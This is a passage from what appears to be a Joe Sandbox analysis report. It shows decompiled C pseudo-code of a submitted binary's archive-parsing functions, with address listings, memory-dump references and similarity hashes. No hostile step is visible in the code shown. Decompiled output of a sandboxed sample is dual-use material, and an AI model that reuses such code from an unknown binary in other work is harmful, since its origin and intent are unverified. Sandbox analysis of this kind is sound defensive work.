													 *((intOrPtr*)( *_t220 + 8))(_t220);
												}
												 *(_t322 - 4) = 4;
												E004038C2(_t322 - 0x78);
												_t222 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t222 != 0) {
													 *((intOrPtr*)( *_t222 + 8))(_t222);
												}
												_t223 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t223 != 0) {
													 *((intOrPtr*)( *_t223 + 8))(_t223);
												}
												_t224 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t224 != 0) {
													 *((intOrPtr*)( *_t224 + 8))(_t224);
												}
												_t184 =  *((intOrPtr*)(_t322 - 0x28));
												goto L77;
											}
											_push(_t322 - 0x4c);
											_push(_t322 - 0x54);
											_push(_t313);
											_t320 = E0040848C(_t319);
											if(_t320 != 0) {
												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t232 != 0) {
													 *((intOrPtr*)( *_t232 + 8))(_t232);
												}
												 *(_t322 - 4) = 4;
												E004038C2(_t322 - 0x78);
												_t234 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t234 != 0) {
													 *((intOrPtr*)( *_t234 + 8))(_t234);
												}
												_t235 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t235 != 0) {
													 *((intOrPtr*)( *_t235 + 8))(_t235);
												}
												_t236 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t236 != 0) {
													 *((intOrPtr*)( *_t236 + 8))(_t236);
												}
												goto L71;
											}
											_push(_t322 - 0x78);
											E004093F0( *((intOrPtr*)(_t322 - 0x20)));
											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t243 != 0) {
												 *((intOrPtr*)( *_t243 + 8))(_t243);
											}
											 *(_t322 - 4) = 4;
											E004038C2(_t322 - 0x78);
											_t245 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t245 != 0) {
												 *((intOrPtr*)( *_t245 + 8))(_t245);
											}
											_t246 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t246 != 0) {
												 *((intOrPtr*)( *_t246 + 8))(_t246);
											}
											_t247 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t247 != 0) {
												 *((intOrPtr*)( *_t247 + 8))(_t247);
											}
											while(1) {
												_t317 =  *((intOrPtr*)(_t322 + 0xc));
												_t307 = 1;
												_t313 = _t313 | 0xffffffff;
												_t181 =  *((intOrPtr*)(_t317 + 8));
												 *(_t322 - 0x24) = _t313;
												if(_t181 < _t307) {
													goto L6;
												}
												goto L4;
											}
										}
									}
								}
							}
						}
						E00408EA0(_t322 - 0xb4);
						 *(_t322 - 4) = 0;
						E00401D7A(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
						 *(_t322 - 0x94) = _t313;
						_t255 = E00408902(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
						_t320 = _t255;
						if(_t320 != 0) {
							 *(_t322 - 4) = _t313;
							E004038C2(_t322 - 0xb4);
							goto L71;
						}
						_push(_t322 - 0xb4);
						E004093F0( *((intOrPtr*)(_t322 - 0x20)));
						 *(_t322 - 4) = _t313;
						E004038C2(_t322 - 0xb4);
						continue;
						L6:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= 0x20) {
							goto L76;
						}
						goto L7;
					}
				} else {
					_t184 = 0x80004001;
					L77:
					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
					return _t184;
				}
			}











































                              0x00408a40
                              0x00408a4d
                              0x00408a4e
                              0x00408a51
                              0x00408a5f
                              0x00408a6d
                              0x00408a6d
                              0x00408a72
                              0x00408a73
                              0x00408a76
                              0x00408a79
                              0x00408a7e
                              0x00000000
                              0x00000000
                              0x00408a80
                              0x00408a83
                              0x00408a88
                              0x00408e81
                              0x00408e8a
                              0x00408e8d
                              0x00000000
                              0x00408e8d
                              0x00408a97
                              0x00408aab
                              0x00408aad
                              0x00408b1a
                              0x00408b1e
                              0x00408b25
                              0x00408b29
                              0x00408b33
                              0x00408b36
                              0x00408b3b
                              0x00408cfb
                              0x00408cfb
                              0x00408d02
                              0x00408d04
                              0x00408e56
                              0x00408e56
                              0x00000000
                              0x00408e56
                              0x00408b46
                              0x00408e75
                              0x00408e75
                              0x00408e79
                              0x00408e7c
                              0x00000000
                              0x00408e7c
                              0x00408b4c
                              0x00408b4e
                              0x00408b58
                              0x00408b5d
                              0x00000000
                              0x00000000
                              0x00408b66
                              0x00000000
                              0x00000000
                              0x00408b6c
                              0x00408b73
                              0x00408b78
                              0x00408b7b
                              0x00408b86
                              0x00408b89
                              0x00408b90
                              0x00408b94
                              0x00408b97
                              0x00408e6c
                              0x00000000
                              0x00408ba5
                              0x00408ba5
                              0x00408ba8
                              0x00408bb0
                              0x00408bb4
                              0x00408bb9
                              0x00408bbc
                              0x00408e63
                              0x00000000
                              0x00408bca
                              0x00408bca
                              0x00408bcd
                              0x00408bd9
                              0x00408bdd
                              0x00408be1
                              0x00408be4
                              0x00408e5a
                              0x00000000
                              0x00408bf2
                              0x00408bf5
                              0x00408bff
                              0x00408c00
                              0x00408c01
                              0x00408c05
                              0x00408c0c
                              0x00408c0f
                              0x00408d11
                              0x00408d15
                              0x00408d1a
                              0x00408d1d
                              0x00408d23
                              0x00408d28
                              0x00408d28
                              0x00408d2b
                              0x00408d2e
                              0x00408d34
                              0x00408d39
                              0x00408d39
                              0x00408d3c
                              0x00408d3f
                              0x00408d45
                              0x00408d4a
                              0x00408d4a
                              0x00408d4d
                              0x00000000
                              0x00408d4d
                              0x00408c15
                              0x00408c18
                              0x00408c27
                              0x00408c2b
                              0x00408c2d
                              0x00408c32
                              0x00408c3a
                              0x00408c3a
                              0x00408c43
                              0x00408c50
                              0x00408c58
                              0x00408c5b
                              0x00408d55
                              0x00408d58
                              0x00408d5e
                              0x00408d63
                              0x00408d63
                              0x00408d66
                              0x00408d69
                              0x00408d6d
                              0x00408d72
                              0x00408d75
                              0x00408d79
                              0x00408d7b
                              0x00408d7d
                              0x00408d80
                              0x00408d80
                              0x00408d83
                              0x00408d86
                              0x00408d8a
                              0x00408d8c
                              0x00408d8e
                              0x00408d91
                              0x00408d91
                              0x00408d94
                              0x00408d98
                              0x00408d9b
                              0x00408d9d
                              0x00408da3
                              0x00408da6
                              0x00408da6
                              0x00000000
                              0x00408c61
                              0x00408c63
                              0x00408dae
                              0x00408db1
                              0x00408db7
                              0x00408dbc
                              0x00408dbc
                              0x00408dc2
                              0x00408dc6
                              0x00408dcb
                              0x00408dce
                              0x00408dd4
                              0x00408dd9
                              0x00408dd9
                              0x00408ddc
                              0x00408ddf
                              0x00408de5
                              0x00408dea
                              0x00408dea
                              0x00408ded
                              0x00408df0
                              0x00408df6
                              0x00408dfb
                              0x00408dfb
                              0x00408dfe
                              0x00000000
                              0x00408dfe
                              0x00408c6e
                              0x00408c72
                              0x00408c73
                              0x00408c79
                              0x00408c7d
                              0x00408e06
                              0x00408e09
                              0x00408e0f
                              0x00408e14
                              0x00408e14
                              0x00408e1a
                              0x00408e1e
                              0x00408e23
                              0x00408e26
                              0x00408e2c
                              0x00408e31
                              0x00408e31
                              0x00408e34
                              0x00408e37
                              0x00408e3d
                              0x00408e42
                              0x00408e42
                              0x00408e45
                              0x00408e48
                              0x00408e4e
                              0x00408e53
                              0x00408e53
                              0x00000000
                              0x00408e4e
                              0x00408c89
                              0x00408c8a
                              0x00408c8f
                              0x00408c92
                              0x00408c98
                              0x00408c9d
                              0x00408c9d
                              0x00408ca3
                              0x00408ca7
                              0x00408cac
                              0x00408caf
                              0x00408cb5
                              0x00408cba
                              0x00408cba
                              0x00408cbd
                              0x00408cc0
                              0x00408cc6
                              0x00408ccb
                              0x00408ccb
                              0x00408cce
                              0x00408cd1
                              0x00408cd7
                              0x00408ce0
                              0x00408ce0
                              0x00408a6d
                              0x00408a6d
                              0x00408a72
                              0x00408a73
                              0x00408a76
                              0x00408a79
                              0x00408a7e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00408a7e
                              0x00408a6d
                              0x00408c5b
                              0x00408be4
                              0x00408bbc
                              0x00408b97
                              0x00408ab5
                              0x00408ac3
                              0x00408ac6
                              0x00408ad4
                              0x00408ae6
                              0x00408aeb
                              0x00408aef
                              0x00408cee
                              0x00408cf1
                              0x00000000
                              0x00408cf1
                              0x00408afe
                              0x00408aff
                              0x00408b0a
                              0x00408b0d
                              0x00000000
                              0x00408a9c
                              0x00408a9f
                              0x00408aa5
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00408aa5
                              0x00408a61
                              0x00408a61
                              0x00408e8f
                              0x00408e95
                              0x00408e9d
                              0x00408e9d

                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                              • Instruction ID: 34c7193a5b50bb33ce0ba2a09d23f7b106f418ab12413814a78bbf0ce5505d58
                              • Opcode Fuzzy Hash: 463f0c4feddd306d7c1a8d70083033d754a2b3fae2b1194d3c8a033132b27601
                              • Instruction Fuzzy Hash: 62E17F70A00249DFCF10DFA4C988AAEBBB4AF58314F2445AEE495F72D1CB389E45CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040EA0B Relevance: 1.8, APIs: 1, Instructions: 255COMMON
                              Download Yara Rule
                              C-Code - Quality: 91%
                              			E0040EA0B(intOrPtr* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _t191;
				intOrPtr* _t197;
				intOrPtr _t202;
				void* _t220;
				void* _t227;
				intOrPtr _t267;
				signed int _t271;
				intOrPtr* _t273;
				intOrPtr* _t277;
				intOrPtr* _t279;
				intOrPtr* _t283;
				void* _t284;
				void* _t289;

				_t289 = __eflags;
				_t271 = __edx;
				E00413954(E0041A72D, _t284);
				_t273 = __ecx;
				E004032A8(_t284 - 0x5c, 8);
				 *((intOrPtr*)(_t284 - 0x5c)) = 0x41b694;
				 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
				E004032A8(_t284 - 0xd8, 1);
				 *((intOrPtr*)(_t284 - 0xd8)) = 0x41b748;
				E004032A8(_t284 - 0xc4, 4);
				 *((intOrPtr*)(_t284 - 0xc4)) = 0x41b684;
				 *(_t284 - 4) = 2;
				E00402155(_t284 - 0x30);
				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
				E004032A8(_t284 - 0x84, 4);
				 *((intOrPtr*)(_t284 - 0x84)) = 0x41b684;
				E004032A8(_t284 - 0x9c, 8);
				 *((intOrPtr*)(_t284 - 0x9c)) = 0x41b694;
				E004032A8(_t284 - 0xb0, 1);
				 *((intOrPtr*)(_t284 - 0xb0)) = 0x41b748;
				E004032A8(_t284 - 0x70, 4);
				 *((intOrPtr*)(_t284 - 0x70)) = 0x41b684;
				_t277 =  *((intOrPtr*)(_t284 + 0x10));
				 *(_t284 - 4) = 7;
				E0040E86B(__ecx, __edx, 0, _t277, _t284 - 0x5c, _t284 - 0xd8, _t284 - 0xc4, _t284 - 0x30, _t284 - 0x84, _t284 - 0x9c, _t284 - 0xb0, _t284 - 0x70);
				 *(_t284 - 0x14) =  *(_t284 - 0x14) & 0x00000000;
				E0040AC6A(_t284 - 0x164, _t289, 1);
				_t227 =  *_t277 +  *((intOrPtr*)(_t284 + 8));
				asm("adc esi, [ebp+0xc]");
				 *(_t284 + 0xc) =  *(_t284 + 0xc) & 0x00000000;
				 *((intOrPtr*)(_t284 - 0x34)) =  *((intOrPtr*)(_t277 + 4));
				if( *((intOrPtr*)(_t284 - 0x28)) <= 0) {
					L17:
					 *(_t284 - 4) = 7;
					E0040C380(_t284 - 0x164, _t301); // executed
					 *(_t284 - 4) = 6;
					E004042AD(_t284 - 0x70);
					 *(_t284 - 4) = 5;
					E004042AD(_t284 - 0xb0);
					 *(_t284 - 4) = 4;
					E004042AD(_t284 - 0x9c);
					 *(_t284 - 4) = 3;
					E004042AD(_t284 - 0x84);
					 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
					 *(_t284 - 4) = 0xc;
					_t279 = 0;
					L18:
					E004042D6();
					 *(_t284 - 4) = 2;
					E004042AD(_t284 - 0x30);
					 *(_t284 - 4) = 1;
					E004042AD(_t284 - 0xc4);
					 *(_t284 - 4) =  *(_t284 - 4) & 0x00000000;
					E004042AD(_t284 - 0xd8);
					 *(_t284 - 4) =  *(_t284 - 4) | 0xffffffff;
					E004042AD(_t284 - 0x5c);
					 *[fs:0x0] =  *((intOrPtr*)(_t284 - 0xc));
					return _t279;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					 *(_t284 - 0x40) =  *(_t284 - 0x40) & 0x00000000;
					 *(_t284 - 0x3c) =  *(_t284 - 0x3c) & 0x00000000;
					 *((intOrPtr*)(_t284 + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t284 - 0x24)) +  *(_t284 + 0xc) * 4));
					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
					_push(_t284 - 0x44);
					 *(_t284 - 4) = 9;
					E0040FA43( *((intOrPtr*)(_t284 + 0x14)));
					 *(_t284 - 4) = 8;
					 *((intOrPtr*)(_t284 - 0x44)) = 0x41b818;
					E00403A9C( *(_t284 - 0x3c));
					_t191 =  *((intOrPtr*)(_t284 + 0x14));
					_t282 =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
					 *(_t284 - 0x10) =  *( *((intOrPtr*)(_t191 + 0xc)) +  *(_t191 + 8) * 4 - 4);
					 *(_t284 - 0x1c) = E0040C281( *((intOrPtr*)(_t284 + 0x10)));
					_t256 =  *(_t284 - 0x1c);
					if( *(_t284 - 0x1c) !=  *(_t284 - 0x1c) || 0 != _t271) {
						E0040DB47(_t256);
					}
					E004076D5(_t282,  *(_t284 - 0x1c));
					_push(0x14);
					_t197 = E00403A76();
					_t283 = 0;
					if(_t197 != 0) {
						 *((intOrPtr*)(_t197 + 4)) = 0;
						 *_t197 = 0x41b824;
						_t283 = _t197;
					}
					_t294 = _t283;
					 *((intOrPtr*)(_t284 - 0x88)) = _t283;
					if(_t283 != 0) {
						 *((intOrPtr*)( *_t283 + 4))(_t283);
					}
					_t271 =  *(_t284 - 0x14);
					 *(_t283 + 0x10) =  *(_t283 + 0x10) & 0x00000000;
					 *((intOrPtr*)(_t283 + 8)) =  *((intOrPtr*)( *(_t284 - 0x10) + 8));
					 *(_t284 - 4) = 0xa;
					 *(_t283 + 0xc) =  *(_t284 - 0x1c);
					_t202 = E0040AD19(_t284 - 0x164, _t294,  *_t273, _t227,  *((intOrPtr*)(_t284 - 0x34)),  *(_t284 - 0x50) + _t271 * 8,  *((intOrPtr*)(_t284 + 0x10)), _t283, 0); // executed
					 *((intOrPtr*)(_t284 - 0x48)) = _t202;
					if(_t202 != 0) {
						break;
					}
					if( *((char*)( *((intOrPtr*)(_t284 + 0x10)) + 0x54)) != 0) {
						_t271 =  *(_t284 - 0x1c);
						_t220 = E004133B0( *((intOrPtr*)( *(_t284 - 0x10) + 8)), _t271);
						_t270 =  *((intOrPtr*)(_t284 + 0x10));
						if(_t220 !=  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x50))) {
							E0040DB47(_t270);
						}
					}
					 *(_t284 - 0x10) =  *(_t284 - 0x10) & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)) <= 0) {
						L14:
						 *(_t284 - 4) = 8;
						if(_t283 != 0) {
							 *((intOrPtr*)( *_t283 + 8))(_t283);
						}
						 *(_t284 + 0xc) =  *(_t284 + 0xc) + 1;
						_t301 =  *(_t284 + 0xc) -  *((intOrPtr*)(_t284 - 0x28));
						if( *(_t284 + 0xc) <  *((intOrPtr*)(_t284 - 0x28))) {
							continue;
						} else {
							goto L17;
						}
					} else {
						do {
							_t271 =  *(_t284 - 0x50);
							 *(_t284 - 0x14) =  *(_t284 - 0x14) + 1;
							_t267 =  *((intOrPtr*)(( *(_t284 - 0x14) << 3) + _t271));
							_t227 = _t227 + _t267;
							asm("adc [ebp-0x34], eax");
							 *((intOrPtr*)(_t273 + 0x48)) =  *((intOrPtr*)(_t273 + 0x48)) + _t267;
							asm("adc [edi+0x4c], eax");
							 *(_t284 - 0x10) =  *(_t284 - 0x10) + 1;
						} while ( *(_t284 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t284 + 0x10)) + 0x30)));
						goto L14;
					}
				}
				__eflags = _t283;
				 *(_t284 - 4) = 8;
				if(__eflags != 0) {
					 *((intOrPtr*)( *_t283 + 8))(_t283);
				}
				 *(_t284 - 4) = 7;
				E0040C380(_t284 - 0x164, __eflags);
				 *(_t284 - 4) = 6;
				E004042AD(_t284 - 0x70);
				 *(_t284 - 4) = 5;
				E004042AD(_t284 - 0xb0);
				 *(_t284 - 4) = 4;
				E004042AD(_t284 - 0x9c);
				 *(_t284 - 4) = 3;
				E004042AD(_t284 - 0x84);
				 *((intOrPtr*)(_t284 - 0x30)) = 0x41b7f8;
				_t279 =  *((intOrPtr*)(_t284 - 0x48));
				 *(_t284 - 4) = 0xb;
				goto L18;
			}
















                              0x0040ea0b
                              0x0040ea0b
                              0x0040ea10
                              0x0040ea1e
                              0x0040ea25
                              0x0040ea2a
                              0x0040ea31
                              0x0040ea3d
                              0x0040ea47
                              0x0040ea55
                              0x0040ea5f
                              0x0040ea68
                              0x0040ea6c
                              0x0040ea71
                              0x0040ea80
                              0x0040ea85
                              0x0040ea93
                              0x0040ea98
                              0x0040eaaa
                              0x0040eaaf
                              0x0040eaba
                              0x0040eabf
                              0x0040eac5
                              0x0040eaf9
                              0x0040eafd
                              0x0040eb02
                              0x0040eb0e
                              0x0040eb18
                              0x0040eb1b
                              0x0040eb1e
                              0x0040eb26
                              0x0040eb29
                              0x0040ec89
                              0x0040ec8f
                              0x0040ec93
                              0x0040ec9b
                              0x0040ec9f
                              0x0040ecaa
                              0x0040ecae
                              0x0040ecb9
                              0x0040ecbd
                              0x0040ecc8
                              0x0040eccc
                              0x0040ecd1
                              0x0040ecd8
                              0x0040ecdc
                              0x0040ecde
                              0x0040ece1
                              0x0040ece9
                              0x0040eced
                              0x0040ecf8
                              0x0040ecfc
                              0x0040ed01
                              0x0040ed0b
                              0x0040ed10
                              0x0040ed17
                              0x0040ed24
                              0x0040ed2c
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040eb2f
                              0x0040eb2f
                              0x0040eb35
                              0x0040eb39
                              0x0040eb45
                              0x0040eb48
                              0x0040eb51
                              0x0040eb52
                              0x0040eb56
                              0x0040eb5e
                              0x0040eb62
                              0x0040eb65
                              0x0040eb6a
                              0x0040eb74
                              0x0040eb7b
                              0x0040eb83
                              0x0040eb88
                              0x0040eb8d
                              0x0040eb93
                              0x0040eb93
                              0x0040eb9d
                              0x0040eba2
                              0x0040eba4
                              0x0040eba9
                              0x0040ebae
                              0x0040ebb0
                              0x0040ebb3
                              0x0040ebb9
                              0x0040ebb9
                              0x0040ebbb
                              0x0040ebbd
                              0x0040ebc3
                              0x0040ebc8
                              0x0040ebc8
                              0x0040ebce
                              0x0040ebd7
                              0x0040ebde
                              0x0040ebe4
                              0x0040ebe8
                              0x0040ebff
                              0x0040ec06
                              0x0040ec09
                              0x00000000
                              0x00000000
                              0x0040ec16
                              0x0040ec1b
                              0x0040ec21
                              0x0040ec26
                              0x0040ec2c
                              0x0040ec2e
                              0x0040ec2e
                              0x0040ec2c
                              0x0040ec36
                              0x0040ec3e
                              0x0040ec6c
                              0x0040ec6e
                              0x0040ec72
                              0x0040ec77
                              0x0040ec77
                              0x0040ec7a
                              0x0040ec80
                              0x0040ec83
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040ec40
                              0x0040ec40
                              0x0040ec43
                              0x0040ec49
                              0x0040ec4c
                              0x0040ec53
                              0x0040ec55
                              0x0040ec58
                              0x0040ec5b
                              0x0040ec5e
                              0x0040ec67
                              0x00000000
                              0x0040ec40
                              0x0040ec3e
                              0x0040ed2f
                              0x0040ed31
                              0x0040ed35
                              0x0040ed3a
                              0x0040ed3a
                              0x0040ed43
                              0x0040ed47
                              0x0040ed4f
                              0x0040ed53
                              0x0040ed5e
                              0x0040ed62
                              0x0040ed6d
                              0x0040ed71
                              0x0040ed7c
                              0x0040ed80
                              0x0040ed85
                              0x0040ed8c
                              0x0040ed8f
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 0040EA10
                                • Part of subcall function 0040FA43: __EH_prolog.LIBCMT ref: 0040FA48
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                              • Instruction ID: 11288496f406677f7bdfcb919023cacd5b8123072d96ac47e6bfd322b071945c
                              • Opcode Fuzzy Hash: 609558a53499a49e72743be03594cb330370f72dde39e5c62d9fac4dd36766c0
                              • Instruction Fuzzy Hash: 38C14770910269DFDB10DFA5C884BDDBBB4BF14308F1080AEE915B72C2CB786A49CB65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F648 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E0040F648(intOrPtr* __ecx, void* __eflags) {
				char* _t92;
				signed char _t103;
				intOrPtr* _t104;
				signed char _t106;
				void* _t112;
				void* _t116;
				signed char _t120;
				void* _t124;
				signed int _t137;
				intOrPtr* _t144;
				void* _t145;
				void* _t164;
				signed char _t168;
				intOrPtr _t170;
				intOrPtr* _t173;
				signed char _t175;
				void* _t176;

				E00413954(E0041A7FC, _t176);
				_t170 =  *((intOrPtr*)(_t176 + 8));
				_t173 = __ecx;
				E0040D377(_t170);
				 *((intOrPtr*)(_t170 + 0x138)) =  *((intOrPtr*)(_t173 + 0x20));
				 *((intOrPtr*)(_t170 + 0x13c)) =  *((intOrPtr*)(_t173 + 0x24));
				_t92 = _t170 + 0x130;
				 *_t92 =  *((intOrPtr*)(_t173 + 0x2e));
				_t143 =  *((intOrPtr*)(_t173 + 0x2f));
				 *((char*)(_t170 + 0x131)) =  *((intOrPtr*)(_t173 + 0x2f));
				if( *_t92 != 0) {
					E0040DB47(_t143);
				}
				_t144 = _t173 + 0x34;
				 *((intOrPtr*)(_t176 + 8)) =  *((intOrPtr*)(_t173 + 0x30));
				_t137 =  *(_t173 + 0x40);
				 *((intOrPtr*)(_t176 - 0x18)) =  *_t144;
				 *((intOrPtr*)(_t176 - 0x14)) =  *((intOrPtr*)(_t144 + 4));
				 *(_t176 - 0x20) =  *(_t173 + 0x3c);
				_t164 = 0x14;
				 *((intOrPtr*)(_t176 - 0x10)) =  *((intOrPtr*)(_t173 + 0x44));
				if(E004133B0(_t144, _t164) !=  *((intOrPtr*)(_t176 + 8))) {
					E0040DB47(_t144);
				}
				_t145 = 0;
				 *((intOrPtr*)(_t170 + 0x140)) =  *((intOrPtr*)(_t173 + 0x20)) + 0x20;
				asm("adc edx, ecx");
				 *((intOrPtr*)(_t170 + 0x144)) =  *((intOrPtr*)(_t173 + 0x24));
				if(( *(_t176 - 0x20) | _t137) != 0) {
					__eflags = _t137 - _t145;
					if(_t137 > _t145) {
						L11:
						_t103 = 1;
					} else {
						__eflags =  *(_t176 - 0x20) - 0xffffffff;
						if( *(_t176 - 0x20) > 0xffffffff) {
							goto L11;
						} else {
							__eflags =  *((intOrPtr*)(_t176 - 0x14)) - _t145;
							if(__eflags > 0) {
								L12:
								_t104 =  *_t173;
								_t103 =  *((intOrPtr*)( *_t104 + 0x10))(_t104,  *((intOrPtr*)(_t176 - 0x18)),  *((intOrPtr*)(_t176 - 0x14)), 1, _t145);
								__eflags = _t103;
								if(_t103 == 0) {
									 *((intOrPtr*)(_t176 - 0x30)) = 0;
									 *((intOrPtr*)(_t176 - 0x2c)) = 0;
									 *((intOrPtr*)(_t176 - 0x34)) = 0x41b818;
									 *(_t176 - 4) = 0;
									E004076D5(_t176 - 0x34,  *(_t176 - 0x20));
									_t106 = E0040776F(__eflags,  *(_t176 - 0x20));
									__eflags = _t106;
									if(_t106 == 0) {
										_t168 =  *(_t176 - 0x20);
										asm("adc ecx, 0x0");
										 *((intOrPtr*)(_t173 + 0x48)) =  *((intOrPtr*)(_t173 + 0x48)) + _t168 + 0x20;
										asm("adc [esi+0x4c], ecx");
										_t151 =  *((intOrPtr*)(_t176 - 0x2c));
										asm("adc ebx, [ebp-0x14]");
										 *((intOrPtr*)(_t170 + 0x1c8)) = _t168 +  *((intOrPtr*)(_t176 - 0x18)) + 0x20;
										asm("adc ebx, 0x0");
										 *(_t170 + 0x1cc) = _t137;
										_t112 = E004133B0( *((intOrPtr*)(_t176 - 0x2c)), _t168);
										__eflags = _t112 -  *((intOrPtr*)(_t176 - 0x10));
										if(_t112 !=  *((intOrPtr*)(_t176 - 0x10))) {
											E0040DB47(_t151);
										}
										 *(_t176 - 0x24) =  *(_t176 - 0x24) & 0x00000000;
										 *(_t176 - 4) = 1;
										E0040DAE2(_t173, _t176 - 0x34);
										E004032A8(_t176 - 0x48, 4);
										 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
										_t154 =  *((intOrPtr*)(_t173 + 0x18));
										 *(_t176 - 4) = 2;
										_t116 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
										__eflags = _t116 - 1;
										if(_t116 != 1) {
											L19:
											__eflags = _t116 - 0x17;
											if(_t116 != 0x17) {
												L21:
												E0040DB47(_t154);
											} else {
												__eflags = _t168;
												if(__eflags != 0) {
													goto L21;
												}
											}
											_t155 = _t173;
											_t120 = E0040EA0B(_t173, _t168, __eflags,  *((intOrPtr*)(_t170 + 0x140)),  *((intOrPtr*)(_t170 + 0x144)), _t170 + 0x150, _t176 - 0x48); // executed
											__eflags = _t120;
											if(_t120 == 0) {
												__eflags =  *(_t176 - 0x40);
												if( *(_t176 - 0x40) != 0) {
													__eflags =  *(_t176 - 0x40) - 1;
													if( *(_t176 - 0x40) > 1) {
														E0040DB47(_t155);
													}
													E0040DA34(_t176 - 0x28);
													E0040DAE2(_t173,  *((intOrPtr*)( *((intOrPtr*)(_t176 - 0x3c)))));
													_t158 =  *((intOrPtr*)(_t173 + 0x18));
													_t124 = E0040DBF4( *((intOrPtr*)(_t173 + 0x18)), _t168);
													__eflags = _t124 - 1;
													if(_t124 != 1) {
														L30:
														E0040DB47(_t158);
													} else {
														__eflags = _t168;
														if(_t168 != 0) {
															goto L30;
														}
													}
													goto L31;
												} else {
													 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
													 *(_t176 - 4) = 4;
													_t175 = 0;
												}
											} else {
												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
												 *(_t176 - 4) = 3;
												goto L32;
											}
										} else {
											__eflags = _t168;
											if(_t168 == 0) {
												L31:
												 *((intOrPtr*)(_t170 + 0x1c0)) =  *((intOrPtr*)(_t173 + 0x48));
												 *((intOrPtr*)(_t170 + 0x1c4)) =  *((intOrPtr*)(_t173 + 0x4c));
												_t120 = E0040ED98(_t173, _t168, _t170);
												 *((intOrPtr*)(_t176 - 0x48)) = 0x41b834;
												 *(_t176 - 4) = 5;
												L32:
												_t175 = _t120;
											} else {
												goto L19;
											}
										}
										E004042D6();
										 *(_t176 - 4) = 1;
										E004042AD(_t176 - 0x48);
										_t81 = _t176 - 4;
										 *_t81 =  *(_t176 - 4) & 0x00000000;
										__eflags =  *_t81;
										E0040DA34(_t176 - 0x28);
									} else {
